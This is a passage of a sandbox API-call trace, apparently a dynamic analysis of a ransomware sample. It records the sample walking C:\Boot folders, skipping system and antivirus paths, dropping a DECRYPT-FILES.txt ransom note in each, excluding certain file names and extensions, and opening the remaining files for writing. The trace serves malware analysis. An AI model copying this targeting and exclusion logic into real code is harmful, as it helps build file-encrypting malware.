hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6a9f200, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6a9f200, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6a9f200, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0071.215] FindClose (in: hFindFile=0x5f8c18 | out: hFindFile=0x5f8c18) returned 1 [0071.215] CloseHandle (hObject=0x420) returned 1 [0071.215] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0071.215] lstrcmpW (lpString1="en-US", lpString2=".") returned 1 [0071.215] lstrcmpW (lpString1="en-US", lpString2="..") returned 1 [0071.215] lstrcatW (in: lpString1="en-US", lpString2="\\" | out: lpString1="en-US\\") returned="en-US\\" [0071.216] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="en-US\\" | out: lpString1="C:\\Boot\\en-US\\") returned="C:\\Boot\\en-US\\" [0071.216] StrStrW (lpFirst="C:\\Boot\\en-US\\", lpSrch="\\Program Files") returned 0x0 [0071.216] StrStrW (lpFirst="C:\\Boot\\en-US\\", lpSrch=":\\Windows") returned 0x0 [0071.216] StrStrW (lpFirst="C:\\Boot\\en-US\\", lpSrch="\\Games\\") returned 0x0 [0071.216] StrStrW (lpFirst="C:\\Boot\\en-US\\", lpSrch="\\Tor Browser\\") returned 0x0 [0071.216] StrStrW (lpFirst="C:\\Boot\\en-US\\", lpSrch="\\ProgramData\\") returned 0x0 [0071.216] StrStrW (lpFirst="C:\\Boot\\en-US\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0071.216] StrStrW (lpFirst="C:\\Boot\\en-US\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0071.216] StrStrW (lpFirst="C:\\Boot\\en-US\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0071.216] StrStrW (lpFirst="C:\\Boot\\en-US\\", lpSrch="\\All Users") returned 0x0 [0071.216] StrStrW (lpFirst="C:\\Boot\\en-US\\", lpSrch="\\IETldCache\\") returned 0x0 [0071.216] StrStrW (lpFirst="C:\\Boot\\en-US\\", lpSrch="\\Local Settings\\") returned 0x0 [0071.216] StrStrW (lpFirst="C:\\Boot\\en-US\\", lpSrch="\\AppData\\Local") returned 0x0 [0071.216] StrStrW (lpFirst="C:\\Boot\\en-US\\", lpSrch="AhnLab") returned 0x0 [0071.216] StrStrW (lpFirst="C:\\Boot\\en-US\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0071.216] lstrlenW (lpString="C:\\Boot\\en-US\\") returned 14 [0071.216] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.216] wsprintfW (in: param_1=0x3f2ebac, param_2="%s\\%s" | out: param_1="C:\\Boot\\en-US\\\\jkbimi8.tmp") returned 26 [0071.216] CreateFileW (lpFileName="C:\\Boot\\en-US\\\\jkbimi8.tmp" (normalized: "c:\\boot\\en-us\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x420 [0071.216] lstrlenW (lpString="C:\\Boot\\en-US\\") returned 14 [0071.216] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0071.216] wsprintfW (in: param_1=0x3f2ebac, param_2="%s\\%s" | out: param_1="C:\\Boot\\en-US\\\\DECRYPT-FILES.txt") returned 32 [0071.216] CreateFileW (lpFileName="C:\\Boot\\en-US\\\\DECRYPT-FILES.txt" (normalized: "c:\\boot\\en-us\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x424 [0071.218] WriteFile (in: hFile=0x424, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2eba8, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2eba8*=0x23fc, lpOverlapped=0x0) returned 1 [0071.219] CloseHandle (hObject=0x424) returned 1 [0071.219] lstrlenW (lpString="C:\\Boot\\en-US\\") returned 14 [0071.219] lstrcatW (in: lpString1="C:\\Boot\\en-US\\", lpString2="*" | out: lpString1="C:\\Boot\\en-US\\*") returned="C:\\Boot\\en-US\\*" [0071.219] FindFirstFileW (in: lpFileName="C:\\Boot\\en-US\\*", lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6ac5360, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6ac5360, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8c18 [0071.219] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.219] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6ac5360, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6ac5360, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.219] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.219] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.219] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x14c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0071.219] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="DECRYPT-FILES.txt") returned -1 [0071.220] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="autorun.inf") returned 1 [0071.220] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="boot.ini") returned 1 [0071.220] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="desktop.ini") returned -1 [0071.220] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat") returned -1 [0071.220] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="iconcache.db") returned -1 [0071.220] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="bootsect.bak") returned -1 [0071.220] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat.log") returned -1 [0071.220] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="thumbs.db") returned -1 [0071.220] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Bootfont.bin") returned 1 [0071.220] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0071.220] lstrcmpiW (lpString1="mui", lpString2="lnk") returned 1 [0071.220] lstrcmpiW (lpString1="mui", lpString2="exe") returned 1 [0071.220] lstrcmpiW (lpString1="mui", lpString2="sys") returned -1 [0071.220] lstrcmpiW (lpString1="mui", lpString2="dll") returned 1 [0071.220] lstrlenW (lpString="C:\\Boot\\en-US\\") returned 14 [0071.220] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0071.220] lstrcpyW (in: lpString1=0x3f2eb9c, lpString2="C:\\Boot\\en-US\\" | out: lpString1="C:\\Boot\\en-US\\") returned="C:\\Boot\\en-US\\" [0071.220] lstrcatW (in: lpString1="C:\\Boot\\en-US\\", lpString2="bootmgr.exe.mui" | out: lpString1="C:\\Boot\\en-US\\bootmgr.exe.mui") returned="C:\\Boot\\en-US\\bootmgr.exe.mui" [0071.220] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0071.220] CreateFileW (lpFileName="C:\\Boot\\en-US\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0071.220] CloseHandle (hObject=0x0) returned 0 [0071.220] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.221] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6ac5360, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6ac5360, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6ac5360, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0071.221] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0071.221] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6ac5360, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6ac5360, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6ac5360, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0071.221] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0071.221] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0071.221] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0071.221] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0071.221] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0071.221] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0071.221] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0071.221] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0071.221] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0071.221] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0071.221] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.221] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0071.221] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0071.221] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0071.221] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0071.221] lstrlenW (lpString="C:\\Boot\\en-US\\") returned 14 [0071.221] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.221] lstrcpyW (in: lpString1=0x3f2eb9c, lpString2="C:\\Boot\\en-US\\" | out: lpString1="C:\\Boot\\en-US\\") returned="C:\\Boot\\en-US\\" [0071.221] lstrcatW (in: lpString1="C:\\Boot\\en-US\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Boot\\en-US\\jkbimi8.tmp") returned="C:\\Boot\\en-US\\jkbimi8.tmp" [0071.221] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0071.222] CreateFileW (lpFileName="C:\\Boot\\en-US\\jkbimi8.tmp" (normalized: "c:\\boot\\en-us\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0071.222] CloseHandle (hObject=0x0) returned 0 [0071.222] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.222] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xc3080a8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xaa50, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0071.222] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="DECRYPT-FILES.txt") returned 1 [0071.222] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="autorun.inf") returned 1 [0071.222] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="boot.ini") returned 1 [0071.222] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="desktop.ini") returned 1 [0071.222] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="ntuser.dat") returned -1 [0071.222] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="iconcache.db") returned 1 [0071.222] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="bootsect.bak") returned 1 [0071.222] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="ntuser.dat.log") returned -1 [0071.222] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="thumbs.db") returned -1 [0071.222] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Bootfont.bin") returned 1 [0071.222] lstrlenW (lpString="memtest.exe.mui") returned 15 [0071.222] lstrcmpiW (lpString1="mui", lpString2="lnk") returned 1 [0071.222] lstrcmpiW (lpString1="mui", lpString2="exe") returned 1 [0071.222] lstrcmpiW (lpString1="mui", lpString2="sys") returned -1 [0071.222] lstrcmpiW (lpString1="mui", lpString2="dll") returned 1 [0071.222] lstrlenW (lpString="C:\\Boot\\en-US\\") returned 14 [0071.222] lstrlenW (lpString="memtest.exe.mui") returned 15 [0071.222] lstrcpyW (in: lpString1=0x3f2eb9c, lpString2="C:\\Boot\\en-US\\" | out: lpString1="C:\\Boot\\en-US\\") returned="C:\\Boot\\en-US\\" [0071.222] lstrcatW (in: lpString1="C:\\Boot\\en-US\\", lpString2="memtest.exe.mui" | out: lpString1="C:\\Boot\\en-US\\memtest.exe.mui") returned="C:\\Boot\\en-US\\memtest.exe.mui" [0071.222] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0071.223] CreateFileW (lpFileName="C:\\Boot\\en-US\\memtest.exe.mui" (normalized: "c:\\boot\\en-us\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0071.223] CloseHandle (hObject=0x0) returned 0 [0071.223] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.223] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xc3080a8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xaa50, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0071.223] FindClose (in: hFindFile=0x5f8c18 | out: hFindFile=0x5f8c18) returned 1 [0071.223] CloseHandle (hObject=0x420) returned 1 [0071.223] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="es-ES", cAlternateFileName="")) returned 1 [0071.223] lstrcmpW (lpString1="es-ES", lpString2=".") returned 1 [0071.223] lstrcmpW (lpString1="es-ES", lpString2="..") returned 1 [0071.223] lstrcatW (in: lpString1="es-ES", lpString2="\\" | out: lpString1="es-ES\\") returned="es-ES\\" [0071.223] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="es-ES\\" | out: lpString1="C:\\Boot\\es-ES\\") returned="C:\\Boot\\es-ES\\" [0071.224] StrStrW (lpFirst="C:\\Boot\\es-ES\\", lpSrch="\\Program Files") returned 0x0 [0071.224] StrStrW (lpFirst="C:\\Boot\\es-ES\\", lpSrch=":\\Windows") returned 0x0 [0071.224] StrStrW (lpFirst="C:\\Boot\\es-ES\\", lpSrch="\\Games\\") returned 0x0 [0071.224] StrStrW (lpFirst="C:\\Boot\\es-ES\\", lpSrch="\\Tor Browser\\") returned 0x0 [0071.224] StrStrW (lpFirst="C:\\Boot\\es-ES\\", lpSrch="\\ProgramData\\") returned 0x0 [0071.224] StrStrW (lpFirst="C:\\Boot\\es-ES\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0071.224] StrStrW (lpFirst="C:\\Boot\\es-ES\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0071.224] StrStrW (lpFirst="C:\\Boot\\es-ES\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0071.224] StrStrW (lpFirst="C:\\Boot\\es-ES\\", lpSrch="\\All Users") returned 0x0 [0071.224] StrStrW (lpFirst="C:\\Boot\\es-ES\\", lpSrch="\\IETldCache\\") returned 0x0 [0071.224] StrStrW (lpFirst="C:\\Boot\\es-ES\\", lpSrch="\\Local Settings\\") returned 0x0 [0071.224] StrStrW (lpFirst="C:\\Boot\\es-ES\\", lpSrch="\\AppData\\Local") returned 0x0 [0071.224] StrStrW (lpFirst="C:\\Boot\\es-ES\\", lpSrch="AhnLab") returned 0x0 [0071.224] StrStrW (lpFirst="C:\\Boot\\es-ES\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0071.224] lstrlenW (lpString="C:\\Boot\\es-ES\\") returned 14 [0071.224] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.224] wsprintfW (in: param_1=0x3f2ebac, param_2="%s\\%s" | out: param_1="C:\\Boot\\es-ES\\\\jkbimi8.tmp") returned 26 [0071.224] CreateFileW (lpFileName="C:\\Boot\\es-ES\\\\jkbimi8.tmp" (normalized: "c:\\boot\\es-es\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x420 [0071.225] lstrlenW (lpString="C:\\Boot\\es-ES\\") returned 14 [0071.225] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0071.225] wsprintfW (in: param_1=0x3f2ebac, param_2="%s\\%s" | out: param_1="C:\\Boot\\es-ES\\\\DECRYPT-FILES.txt") returned 32 [0071.225] CreateFileW (lpFileName="C:\\Boot\\es-ES\\\\DECRYPT-FILES.txt" (normalized: "c:\\boot\\es-es\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x424 [0071.225] WriteFile (in: hFile=0x424, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2eba8, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2eba8*=0x23fc, lpOverlapped=0x0) returned 1 [0071.226] CloseHandle (hObject=0x424) returned 1 [0071.227] lstrlenW (lpString="C:\\Boot\\es-ES\\") returned 14 [0071.227] lstrcatW (in: lpString1="C:\\Boot\\es-ES\\", lpString2="*" | out: lpString1="C:\\Boot\\es-ES\\*") returned="C:\\Boot\\es-ES\\*" [0071.227] FindFirstFileW (in: lpFileName="C:\\Boot\\es-ES\\*", lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6ac5360, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6ac5360, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8c18 [0071.227] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.227] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6ac5360, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6ac5360, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.227] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.227] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.227] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0071.227] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="DECRYPT-FILES.txt") returned -1 [0071.227] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="autorun.inf") returned 1 [0071.227] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="boot.ini") returned 1 [0071.227] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="desktop.ini") returned -1 [0071.227] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat") returned -1 [0071.227] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="iconcache.db") returned -1 [0071.227] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="bootsect.bak") returned -1 [0071.227] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat.log") returned -1 [0071.227] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="thumbs.db") returned -1 [0071.227] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Bootfont.bin") returned 1 [0071.227] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0071.227] lstrcmpiW (lpString1="mui", lpString2="lnk") returned 1 [0071.227] lstrcmpiW (lpString1="mui", lpString2="exe") returned 1 [0071.227] lstrcmpiW (lpString1="mui", lpString2="sys") returned -1 [0071.227] lstrcmpiW (lpString1="mui", lpString2="dll") returned 1 [0071.227] lstrlenW (lpString="C:\\Boot\\es-ES\\") returned 14 [0071.227] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0071.227] lstrcpyW (in: lpString1=0x3f2eb9c, lpString2="C:\\Boot\\es-ES\\" | out: lpString1="C:\\Boot\\es-ES\\") returned="C:\\Boot\\es-ES\\" [0071.227] lstrcatW (in: lpString1="C:\\Boot\\es-ES\\", lpString2="bootmgr.exe.mui" | out: lpString1="C:\\Boot\\es-ES\\bootmgr.exe.mui") returned="C:\\Boot\\es-ES\\bootmgr.exe.mui" [0071.227] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0071.228] CreateFileW (lpFileName="C:\\Boot\\es-ES\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0071.228] CloseHandle (hObject=0x0) returned 0 [0071.228] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.228] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6ac5360, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6ac5360, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6aeb4c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0071.228] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0071.228] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6ac5360, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6ac5360, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6ac5360, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0071.228] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0071.228] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0071.228] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0071.228] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0071.228] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0071.228] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0071.228] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0071.228] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0071.228] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0071.228] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0071.228] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.229] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0071.229] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0071.229] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 